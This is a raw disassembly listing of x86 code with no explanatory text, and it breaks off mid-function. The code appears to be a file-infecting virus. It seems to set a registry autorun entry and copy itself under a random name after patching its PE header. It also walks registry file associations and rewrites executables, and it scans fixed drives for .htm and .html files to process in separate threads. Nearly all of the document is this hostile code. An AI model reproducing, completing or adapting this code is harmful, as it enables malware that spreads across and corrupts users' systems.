push eax
push edi
call sub_40A188
cmp eax, edi
jz short loc_403ABE
push (offset loc_41467C+1)
lea eax, [ebp-200h]
push eax
call sub_40A248
lea eax, [ebp-204h]
push eax
push (offset loc_414646+1)
push 80000002h
call sub_40A2BA
cmp eax, edi
jnz short loc_403AB3
push 104h
lea eax, [ebp-200h]
push eax
push 1
push edi
push (offset loc_4146B8+1)
push dword ptr [ebp-204h]
call sub_40A2E4
cmp eax, edi
jnz short loc_403AB3
inc edi
loc_403AB3: ; CODE XREF: rdata:00403A8D�j
; rdata:00403AB0�j
push dword ptr [ebp-204h]
call sub_40A2B4
loc_403ABE: ; CODE XREF: rdata:00403A62�j
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
dd 0
dd 24648Dh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
xor edi, edi
lea eax, [ebp-4]
push eax
push (offset loc_414646+1)
push 80000002h
call sub_40A2CC
cmp eax, edi
jnz short loc_403B0C
push (offset loc_4146B8+1)
push dword ptr [ebp-4]
call sub_40A2C0
cmp eax, edi
jnz short loc_403B04
inc edi
loc_403B04: ; CODE XREF: rdata:00403B01�j
push dword ptr [ebp-4]
call sub_40A2B4
loc_403B0C: ; CODE XREF: rdata:00403AF0�j
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 9B8D0000h
dword_403B1C dd 0 ; sub_408DC0+22B�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B20 proc near ; CODE XREF: rdata:loc_40357C�p
; rdata:00403729�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
cmp ds:dword_4148B8, 0
jnz short loc_403B85
push offset loc_41476C
call sub_40A18E
mov ebx, eax
lea esi, byte_4149C7
lea edi, dword_414997
push ds:dword_4148B4
pop [ebp+var_4]
jmp short loc_403B6E
; ---------------------------------------------------------------------------
loc_403B55: ; CODE XREF: sub_403B20+52�j
push dword ptr [esi]
push ebx
call sub_40A194
or eax, eax
jnz short loc_403B63
jmp short loc_403B74
; ---------------------------------------------------------------------------
loc_403B63: ; CODE XREF: sub_403B20+3F�j
mov [edi], eax
add edi, 4
add esi, 4
dec [ebp+var_4]
loc_403B6E: ; CODE XREF: sub_403B20+33�j
cmp [ebp+var_4], 0
jnz short loc_403B55
loc_403B74: ; CODE XREF: sub_403B20+41�j
mov eax, [ebp+var_4]
or eax, eax
jnz short loc_403B85
mov ds:dword_4148B8, 1
loc_403B85: ; CODE XREF: sub_403B20+10�j
; sub_403B20+59�j
pop ebx
pop esi
pop edi
leave
retn
sub_403B20 endp
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B90 proc near ; CODE XREF: rdata:00403679�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push edi
push esi
push ebx
push offset loc_41476C
call sub_40A18E
mov ebx, eax
push offset dword_4147BC
push ebx
call sub_40A194
mov dword_41BA98, eax
or eax, eax
jz loc_403C43
push offset word_4147D2
push ebx
call sub_40A194
mov dword_41BA94, eax
or eax, eax
jz short loc_403C43
push offset dword_4147E8
push ebx
call sub_40A194
mov dword_41BA9C, eax
or eax, eax
jz short loc_403C43
xor edi, edi
mov [ebp+var_4], edi
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call dword_41BA94
cmp eax, edi
jz short loc_403C43
call sub_40A164
mov edx, eax
lea eax, [ebp+var_8]
push eax
push 28h
push edx
call dword_41BA9C
cmp eax, edi
jz short loc_403C43
mov esi, eax
mov [ebp+var_18], 1
mov [ebp+var_C], 2
push edi
push edi
push edi
lea eax, [ebp+var_18]
push eax
push edi
push [ebp+var_8]
call dword_41BA98
cmp eax, edi
jz short loc_403C3D
inc edi
loc_403C3D: ; CODE XREF: sub_403B90+AA�j
push esi
call sub_40A0FE
loc_403C43: ; CODE XREF: sub_403B90+27�j
; sub_403B90+3F�j ...
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 4
sub_403B90 endp
; ---------------------------------------------------------------------------
dd 24648Dh, 0FF535657h, 41B78E35h, 9A35FF00h, 0E80041B7h
dd 6530h, 274C00Bh, 5E5BD0FFh, 0FF8BC35Fh, 0FF535657h
dd 41B79235h, 9A35FF00h, 0E80041B7h, 6510h, 274C00Bh, 5E5BD0FFh
dd 0FF8BC35Fh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
call sub_403D90
push dword_41B78A
push dword_41B79A
call sub_40A194
or eax, eax
jz short loc_403CBB
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
loc_403CBB: ; CODE XREF: rdata:00403CAE�j
pop ebx
pop esi
pop edi
leave
retn 0Ch
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
dd 0FF535657h, 41B78635h, 9A35FF00h, 0E80041B7h, 64B0h
dd 274C00Bh, 5E5BD0FFh, 0FF8BC35Fh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
push dword_41B796
push dword_41B79A
call sub_40A194
or eax, eax
jz short loc_403D13
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
loc_403D13: ; CODE XREF: rdata:00403D09�j
pop ebx
pop esi
pop edi
leave
retn 8
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
; =============== S U B R O U T I N E =======================================
sub_403D20 proc near ; CODE XREF: rdata:00409BDD�p
push edi
push esi
push ebx
mov edi, dword_41B79E
mov esi, edi
add esi, [esi+3Ch]
mov ebx, [esi+34h]
lea esi, [esi+78h]
mov edx, [esi]
add edx, edi
mov eax, [edx+0Ch]
add eax, edi
mov dword_41B782, eax
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, edi
lea esi, word_41B786
jmp short loc_403D5F
; ---------------------------------------------------------------------------
loc_403D52: ; CODE XREF: sub_403D20+41�j
mov eax, [ebx]
add eax, edi
mov [esi], eax
add esi, 4
add ebx, 4
dec ecx
loc_403D5F: ; CODE XREF: sub_403D20+30�j
or ecx, ecx
jnz short loc_403D52
push dword_41B782
call sub_40A18E
or eax, eax
jnz short loc_403D7D
push dword_41B782
call sub_40A1CA
loc_403D7D: ; CODE XREF: sub_403D20+50�j
mov dword_41B79A, eax
pop ebx
pop esi
pop edi
retn
sub_403D20 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 498D00h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D90 proc near ; CODE XREF: rdata:00403C96�p
var_38C = dword ptr -38Ch
var_388 = dword ptr -388h
var_384 = byte ptr -384h
var_258 = byte ptr -258h
var_12C = byte ptr -12Ch
push ebp
mov ebp, esp
add esp, 0FFFFFC74h
push edi
push esi
push ebx
push offset loc_41450E
push 1
push 0
call sub_40A11C
mov dword_41B7A2, eax
call sub_40A17C
or eax, eax
jnz loc_403E90
push dword_41B7A2
call sub_40A0FE
push 12Ch
lea eax, [ebp+var_384]
push eax
push dword_41B79E
call sub_40A188
push 12Ch
lea eax, [ebp+var_12C]
push eax
call sub_40A19A
lea ecx, [ebp+var_12C]
cmp byte ptr [eax+ecx-1], 5Ch
jz short loc_403E02
mov word ptr [eax+ecx], 5Ch
loc_403E02: ; CODE XREF: sub_403D90+6A�j
lea eax, [ebp+var_12C]
push eax
push (offset loc_414780+4)
lea eax, [ebp+var_258]
push eax
call sub_40A0F2
add esp, 0Ch
lea eax, [ebp+var_38C]
push eax
lea eax, [ebp+var_388]
push eax
lea eax, [ebp+var_384]
push eax
call sub_403F60
mov edi, [ebp+var_388]
cmp word ptr [edi], 5A4Dh
jnz short loc_403E55
add edi, [edi+3Ch]
cmp dword ptr [edi], 4550h
jnz short loc_403E55
xor word ptr [edi+16h], 2000h
loc_403E55: ; CODE XREF: sub_403D90+B2�j
; sub_403D90+BD�j
push [ebp+var_38C]
push [ebp+var_388]
lea eax, [ebp+var_258]
push eax
call sub_403EB0
cmp eax, 0FFFFFFFFh
jz short loc_403E7E
lea eax, [ebp+var_258]
push eax
call sub_403F10
loc_403E7E: ; CODE XREF: sub_403D90+E0�j
push 8000h
push 0
push [ebp+var_388]
call sub_40A230
loc_403E90: ; CODE XREF: sub_403D90+26�j
push dword_41B7A2
call sub_40A0FE
xor eax, eax
pop ebx
pop esi
pop edi
leave
retn
sub_403D90 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EB0 proc near ; CODE XREF: sub_403D90+D8�p
; sub_403FF0+11A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
push 0
push 80h
push 4
push 0
push 3
push 40000000h
push [ebp+arg_0]
call sub_40A110
cmp eax, 0FFFFFFFFh
jz short loc_403F02
mov [ebp+var_4], eax
push 0
push 0
push 0
push [ebp+var_4]
call sub_40A206
push 0
push esp
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_4]
call sub_40A242
push [ebp+var_4]
call sub_40A0FE
loc_403F02: ; CODE XREF: sub_403EB0+26�j
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_403EB0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F10 proc near ; CODE XREF: sub_403D90+E9�p
var_54 = dword ptr -54h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFACh
push edi
xor eax, eax
lea edi, [ebp+var_54]
mov ecx, 44h
rep stosb
mov [ebp+var_54], 44h
xor edx, edx
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push edx
push edx
push edx
push edx
push edx
push edx
push [ebp+arg_0]
push edx
call sub_40A122
push [ebp+var_10]
call sub_40A0FE
push [ebp+var_C]
call sub_40A0FE
pop edi
leave
retn 4
sub_403F10 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F60 proc near ; CODE XREF: sub_403D90+A2�p
; sub_403FF0+A0�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov ebx, 0FFFFFFFFh
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push [ebp+arg_0]
call sub_40A110
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jz short loc_403FDD
push 0
push [ebp+var_4]
call sub_40A176
mov [ebp+var_8], eax
push 40h
push 1000h
push [ebp+var_8]
push 0
call sub_40A22A
or eax, eax
jz short loc_403FDD
mov edi, eax
or eax, eax
jz short loc_403FDD
mov ecx, [ebp+arg_4]
mov [ecx], edi
push 0
push esp
push [ebp+var_8]
push edi
push [ebp+var_4]
call sub_40A1E8
push [ebp+var_4]
call sub_40A0FE
mov ecx, [ebp+arg_8]
mov eax, [ebp+var_8]
mov [ecx], eax
inc ebx
loc_403FDD: ; CODE XREF: sub_403F60+2E�j
; sub_403F60+50�j ...
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_403F60 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 498D00h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FF0 proc near ; CODE XREF: rdata:004043E5�p
var_4C0 = dword ptr -4C0h
var_4BC = dword ptr -4BCh
var_4B8 = dword ptr -4B8h
var_4B4 = dword ptr -4B4h
var_4B0 = byte ptr -4B0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFB40h
push edi
push esi
push ebx
push offset byte_414795
push 0
push 4
call sub_40A1E2
or eax, eax
jz short loc_404068
mov [ebp+var_4BC], eax
push 0
push 0
push 0
push 4
push [ebp+var_4BC]
call sub_40A1DC
mov [ebp+var_4C0], eax
mov ecx, [eax]
mov [ebp+var_4B8], ecx
add eax, 4
mov edi, eax
push 40h
push 1000h
push [ebp+var_4B8]
push 0
call sub_40A22A
mov [ebp+var_4B4], eax
push [ebp+var_4B8]
push edi
push [ebp+var_4B4]
call sub_40F5BF
jmp short loc_404095
; ---------------------------------------------------------------------------
loc_404068: ; CODE XREF: sub_403FF0+1C�j
push 258h
lea eax, [ebp+var_4B0]
push eax
push 0
call sub_40A188
lea eax, [ebp+var_4B8]
push eax
lea eax, [ebp+var_4B4]
push eax
lea eax, [ebp+var_4B0]
push eax
call sub_403F60
loc_404095: ; CODE XREF: sub_403FF0+76�j
mov edi, [ebp+var_4B4]
cmp word ptr [edi], 5A4Dh
jnz short loc_4040B3
add edi, [edi+3Ch]
cmp dword ptr [edi], 4550h
jnz short loc_4040B3
or word ptr [edi+16h], 2000h
loc_4040B3: ; CODE XREF: sub_403FF0+B0�j
; sub_403FF0+BB�j
mov edi, [ebp+var_4B4]
mov esi, edi
add esi, [esi+3Ch]
mov ebx, [esi+34h]
lea esi, [esi+78h]
mov eax, [esi]
push eax
push edi
call sub_404130
add eax, edi
mov eax, [eax+0Ch]
push eax
push edi
call sub_404130
add edi, eax
push edi
call sub_40A266
push eax
push 0
push edi
call sub_40F5F0
push [ebp+arg_0]
push edi
call sub_40A25A
push [ebp+arg_4]
call sub_4041A0
push [ebp+var_4B8]
push [ebp+var_4B4]
push [ebp+arg_4]
call sub_403EB0
push 8000h
push 0
push [ebp+var_4B4]
call sub_40A230
pop ebx
pop esi
pop edi
leave
retn 8
sub_403FF0 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404130 proc near ; CODE XREF: sub_403FF0+D8�p
; sub_403FF0+E4�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
pusha
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov ecx, [esi+3Ch]
add esi, ecx
movzx eax, word ptr [esi+6]
mov [ebp+var_8], eax
add esi, 0F8h
mov ebx, esi
add ebx, 28h
jmp short loc_404185
; ---------------------------------------------------------------------------
loc_404156: ; CODE XREF: sub_404130+59�j
mov ecx, [esi+0Ch]
mov eax, [ebx+0Ch]
cmp edi, ecx
jb short loc_40416C
cmp edi, eax
jnb short loc_40416C
sub edi, [esi+0Ch]
add edi, [esi+14h]
jmp short loc_40418B
; ---------------------------------------------------------------------------
loc_40416C: ; CODE XREF: sub_404130+2E�j
; sub_404130+32�j
cmp edi, ecx
jbe short loc_40417C
cmp edi, eax
ja short loc_40417C
sub edi, [ebx+0Ch]
add edi, [ebx+14h]
jmp short loc_40418B
; ---------------------------------------------------------------------------
loc_40417C: ; CODE XREF: sub_404130+3E�j
; sub_404130+42�j
add ebx, 28h
add esi, 28h
dec [ebp+var_8]
loc_404185: ; CODE XREF: sub_404130+24�j
cmp [ebp+var_8], 0
jnz short loc_404156
loc_40418B: ; CODE XREF: sub_404130+3A�j
; sub_404130+4A�j
mov [ebp+var_4], edi
popa
mov eax, [ebp+var_4]
leave
retn 8
sub_404130 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 498D00h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041A0 proc near ; CODE XREF: sub_403FF0+106�p
var_2F4 = dword ptr -2F4h
var_2EE = byte ptr -2EEh
var_2BC = byte ptr -2BCh
var_258 = byte ptr -258h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFD0Ch
push edi
push esi
push ebx
mov [ebp+var_2F4], 0
push 12Ch
lea eax, [ebp+var_258]
push eax
call sub_40A19A
lea ecx, [ebp+var_258]
cmp byte ptr [eax+ecx-1], 5Ch
jz short loc_4041DA
mov word ptr [eax+ecx], 5Ch
loc_4041DA: ; CODE XREF: sub_4041A0+32�j
lea eax, [ebp+var_2EE]
push eax
call sub_40A27E
mov esi, 8
lea ebx, loc_414611+1
lea edi, [ebp+var_2BC]
jmp short loc_40421E
; ---------------------------------------------------------------------------
loc_4041F9: ; CODE XREF: sub_4041A0+80�j
lea edx, [ebp+var_2EE]
mov eax, [ebp+var_2F4]
lea eax, [eax+edx]
mov eax, [eax]
xor edx, edx
mov ecx, 1Ah
div ecx
mov al, dl
xlat
stosb
dec esi
inc [ebp+var_2F4]
loc_40421E: ; CODE XREF: sub_4041A0+57�j
or esi, esi
jnz short loc_4041F9
lea eax, [ebp+var_2BC]
push eax
lea eax, [ebp+var_258]
push eax
push offset byte_4147F9
push [ebp+arg_0]
call sub_40A0F2
add esp, 10h
pop ebx
pop esi
pop edi
leave
retn 4
sub_4041A0 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 0FF8B0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404250 proc near ; CODE XREF: rdata:004043F1�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push edi
push esi
push ebx
xor edi, edi
push edi
push 80h
push 3
push edi
push edi
push 0C0000000h
push [ebp+arg_0]
call sub_40A110
cmp eax, 0FFFFFFFFh
jz short loc_4042F3
mov [ebp+var_4], eax
push edi
push edi
push edi
push 4
push edi
push [ebp+var_4]
call sub_40A116
mov [ebp+var_8], eax
push edi
push edi
push edi
push 0F001Fh
push [ebp+var_8]
call sub_40A1DC
mov [ebp+var_C], eax
push edi
push [ebp+var_4]
call sub_40A176
mov [ebp+var_10], eax
mov [ebp+var_18], edi
mov [ebp+var_14], edi
mov esi, [ebp+var_C]
add esi, [esi+3Ch]
mov [esi+58h], edi
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_10]
push [ebp+var_C]
call sub_40A278
mov eax, [ebp+var_18]
mov [esi+58h], eax
push edi
push [ebp+var_C]
call sub_40A158
push [ebp+var_C]
call sub_40A224
push [ebp+var_8]
call sub_40A0FE
push [ebp+var_4]
call sub_40A0FE
loc_4042F3: ; CODE XREF: sub_404250+25�j
pop ebx
pop esi
pop edi
leave
retn 4
sub_404250 endp
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
push ebp
mov ebp, esp
add esp, 0FFFFF628h
push edi
push esi
push ebx
lea eax, [ebp-4]
push eax
push 0F003Fh
push 0
push offset word_414802
push 80000000h
call sub_40A2D2
xor esi, esi
loc_404328: ; CODE XREF: rdata:00404427�j
mov dword ptr [ebp-9D8h], 258h
push 0
push 0
push 0
push 0
lea eax, [ebp-9D8h]
push eax
lea eax, [ebp-9D0h]
push eax
push esi
push dword ptr [ebp-4]
call sub_40A2C6
or eax, eax
jz short loc_40435A
jmp loc_40442C
; ---------------------------------------------------------------------------
loc_40435A: ; CODE XREF: rdata:00404353�j
lea eax, [ebp-9D0h]
push eax
push offset byte_414809
lea eax, [ebp-260h]
push eax
call sub_40A0F2
add esp, 0Ch
lea eax, [ebp-8]
push eax
lea eax, [ebp-260h]
push eax
push dword ptr [ebp-4]
call sub_40A2CC
mov dword ptr [ebp-778h], 258h
lea eax, [ebp-778h]
push eax
lea eax, [ebp-4B8h]
push eax
push 0
push dword ptr [ebp-8]
call sub_40A2D8
or eax, eax
jnz short loc_40441E
lea eax, [ebp-4B8h]
push eax
call sub_40A0F8
mov ebx, 8
lea edi, byte_41481B
jmp short loc_40441A
; ---------------------------------------------------------------------------
loc_4043C7: ; CODE XREF: rdata:0040441C�j
push dword ptr [edi]
lea eax, [ebp-4B8h]
push eax
call sub_40A272
add esp, 8
or eax, eax
jz short loc_404416
lea eax, [ebp-774h]
push eax
push dword ptr [edi]
call sub_403FF0
lea eax, [ebp-774h]
push eax
call sub_404250
lea eax, [ebp-774h]
push eax
call sub_40A266
push eax
lea eax, [ebp-774h]
push eax
push 1
push 0
push dword ptr [ebp-8]
call sub_40A2DE
loc_404416: ; CODE XREF: rdata:004043DA�j
add edi, 4
dec ebx
loc_40441A: ; CODE XREF: rdata:004043C5�j
or ebx, ebx
jnz short loc_4043C7
loc_40441E: ; CODE XREF: rdata:004043AC�j
push dword ptr [ebp-8]
call sub_40A2B4
inc esi
jmp loc_404328
; ---------------------------------------------------------------------------
loc_40442C: ; CODE XREF: rdata:00404355�j
push dword ptr [ebp-4]
call sub_40A2B4
pop ebx
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
db 5
align 10h
push ebp
mov ebp, esp
add esp, 0FFFFFE90h
push edi
push esi
push ebx
loc_40444C: ; CODE XREF: rdata:004044EE�j
mov dword ptr [ebp-4], 12Ch
lea eax, [ebp-130h]
push eax
lea eax, [ebp-4]
push eax
call sub_40A182
lea esi, [ebp-130h]
jmp short loc_4044DF
; ---------------------------------------------------------------------------
loc_40446B: ; CODE XREF: rdata:004044E2�j
push esi
call sub_40A170
cmp eax, 3
jnz short loc_4044D6
push 32h
call sub_40A290
mov [ebp-168h], eax
push esi
push dword ptr [ebp-168h]
call sub_40A25A
mov ecx, [ebp-168h]
mov byte ptr [ecx+2], 0
lea eax, [ebp-16Ch]
push eax
push 1
push dword ptr [ebp-168h]
push offset sub_402100
push 0
push 0
call sub_40A128
mov [ebp-170h], eax
push 0FFFFFFF1h
push dword ptr [ebp-170h]
call sub_40A20C
push 0FFFFFFFFh
push dword ptr [ebp-170h]
call sub_40A236
loc_4044D6: ; CODE XREF: rdata:00404474�j
push esi
call sub_40A266
inc eax
add esi, eax
loc_4044DF: ; CODE XREF: rdata:00404469�j
cmp byte ptr [esi], 0
jnz short loc_40446B
push 112A880h
call sub_40A212
jmp loc_40444C
; ---------------------------------------------------------------------------
db 5Bh
dd 0C2C95F5Eh, 9B8D0004h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404500 proc near ; CODE XREF: sub_404500+7D�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
push 26Ah
call sub_40A290
mov esi, eax
mov byte ptr [esi+13Eh], 0
push (offset loc_41460A+4)
push [ebp+arg_0]
push offset loc_414608
lea eax, [esi+13Eh]
push eax
call sub_40A0F2
add esp, 10h
push esi
lea eax, [esi+13Eh]
push eax
call sub_40A14C
mov ebx, eax
jmp loc_40460D
; ---------------------------------------------------------------------------
loc_40454C: ; CODE XREF: sub_404500+10F�j
cmp byte ptr [esi+2Ch], 2Eh
jz loc_404606
lea eax, [esi+2Ch]
push eax
push [ebp+arg_0]
push offset loc_414608
lea eax, [esi+13Eh]
push eax
call sub_40A0F2
add esp, 10h
test byte ptr [esi], 10h
jz short loc_40458B
lea eax, [esi+13Eh]
push eax
call sub_404500
push 64h
call sub_40A212
jmp short loc_404606
; ---------------------------------------------------------------------------
loc_40458B: ; CODE XREF: sub_404500+74�j
lea eax, [esi+2Ch]
push eax
call sub_40A0F8
lea eax, [esi+2Ch]
push eax
call sub_40A266
lea edi, [esi+2Ch]
cmp dword ptr [eax+edi-4], 6D74682Eh
jz short loc_4045B4
cmp dword ptr [eax+edi-4], 6C6D7468h
jnz short loc_404606
loc_4045B4: ; CODE XREF: sub_404500+A8�j
push 258h
call sub_40A290
mov [ebp+var_8], eax
lea eax, [esi+13Eh]
push eax
push [ebp+var_8]
call sub_40A25A
lea eax, [ebp+var_4]
push eax
push 1
push [ebp+var_8]
push offset loc_402230
push 0
push 0
call sub_40A128
mov [ebp+var_C], eax
push 0FFFFFFF1h
push [ebp+var_C]
call sub_40A20C
push 0FFFFFFFFh
push [ebp+var_C]
call sub_40A236
push [ebp+var_C]
call sub_40A0FE
loc_404606: ; CODE XREF: sub_404500+50�j
; sub_404500+89�j ...
push esi
push ebx
call sub_40A152
loc_40460D: ; CODE XREF: sub_404500+47�j
or eax, eax
jnz loc_40454C
push ebx
call sub_40A146
push esi
call sub_40A296
pop ebx
pop esi
pop edi
leave
retn 4
sub_404500 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFF880h
push edi
push esi
push ebx
push offset word_41B362
call sub_40A134
push dword ptr [ebp+8]
lea eax, [ebp-4BCh]
push eax
call sub_40A25A
push dword ptr [ebp+8]
call sub_40A296
push offset word_41B362
call sub_40A1C4
push 20h
lea eax, [ebp-4BCh]
push eax
call sub_40A200
lea eax, [ebp-4BCh]
push eax
lea eax, [ebp-390h]
push eax
call sub_40A25A
lea eax, [ebp-714h]
push eax
lea eax, [ebp-390h]
push eax
call sub_4049A0
lea eax, [ebp-264h]
push eax
lea eax, [ebp-138h]
push eax
lea eax, [ebp-714h]
push eax
call sub_404A80
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
lea eax, [ebp-390h]
push eax
call sub_409DB0
or eax, eax
jnz loc_40480A
add dword ptr [ebp-8], 2BCh
push dword ptr [ebp-8]
call sub_40A290
mov [ebp-0Ch], eax
push dword ptr [ebp-4]
push dword ptr [ebp-0Ch]
call sub_40A25A
push dword ptr [ebp-0Ch]
call sub_40A0F8
push offset loc_41458B
push dword ptr [ebp-0Ch]
push 1
call sub_4083A0
or eax, eax
jz loc_4047FA
cmp eax, 0FFFFFFFFh
jz loc_4047FA
dec eax
mov ebx, eax
mov esi, [ebp-4]
add ebx, 6
mov ecx, ebx
add ecx, esi
push ecx
lea eax, [ebp-138h]
push eax
call sub_404820
or eax, eax
jz loc_4047FA
mov ecx, ebx
inc ecx
push ecx
push esi
push dword ptr [ebp-0Ch]
call sub_40A260
add esi, ebx
lea eax, [ebp-138h]
push eax
push dword ptr [ebp-0Ch]
call sub_40A248
push esi
push dword ptr [ebp-0Ch]
call sub_40A248
push dword ptr [ebp-0Ch]
call sub_40A266
push eax
push dword ptr [ebp-0Ch]
lea eax, [ebp-390h]
push eax
call sub_404940
lea eax, [ebp-780h]
push eax
lea eax, [ebp-77Ch]
push eax
call sub_404CC5
push dword ptr [ebp-780h]
push dword ptr [ebp-77Ch]
lea eax, [ebp-714h]
push eax
call sub_404940
push 8000h
push 0
push dword ptr [ebp-77Ch]
call sub_40A230
lea eax, [ebp-778h]
push eax
call sub_404B00
lea eax, [ebp-778h]
push eax
push offset loc_414537
lea eax, [ebp-264h]
push eax
push 80000000h
call sub_404870
lea eax, [ebp-714h]
push eax
push offset loc_414540
lea eax, [ebp-264h]
push eax
push 80000000h
call sub_404870
loc_4047FA: ; CODE XREF: rdata:00404707�j
; rdata:00404710�j ...
push dword ptr [ebp-0Ch]
call sub_40A296
push dword ptr [ebp-4]
call sub_40A296
loc_40480A: ; CODE XREF: rdata:004046CB�j
pop ebx
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 8
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404820 proc near ; CODE XREF: rdata:0040472B�p
var_320 = byte ptr -320h
var_190 = byte ptr -190h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFCE0h
push edi
push esi
push ebx
push [ebp+arg_0]
call sub_40A266
inc eax
mov ebx, eax
push [ebp+arg_0]
lea eax, [ebp+var_190]
push eax
call sub_40A25A
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_320]
push eax
call sub_40A260
lea eax, [ebp+var_320]
push eax
lea eax, [ebp+var_190]
push eax
call sub_40A24E
pop ebx
pop esi
pop edi
leave
retn 8
sub_404820 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404870 proc near ; CODE XREF: rdata:004047D8�p
; rdata:004047F5�p ...
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFED0h
push edi
push [ebp+arg_4]
push [ebp+arg_8]
lea eax, [ebp+var_12C]
push eax
call sub_40A0F2
add esp, 0Ch
lea eax, [ebp+var_130]
push eax
lea eax, [ebp+var_12C]
push eax
push [ebp+arg_0]
call sub_40A2BA
or eax, eax
jnz short loc_4048D2
push [ebp+arg_C]
call sub_40A266
inc eax
push eax
push [ebp+arg_C]
push 1
push 0
push 0
push [ebp+var_130]
call sub_40A2E4
push [ebp+var_130]
call sub_40A2B4
loc_4048D2: ; CODE XREF: sub_404870+37�j
pop edi
leave
retn 10h
sub_404870 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 0FF8B0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048E0 proc near ; CODE XREF: sub_404A80+54�p
; sub_404A80+68�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
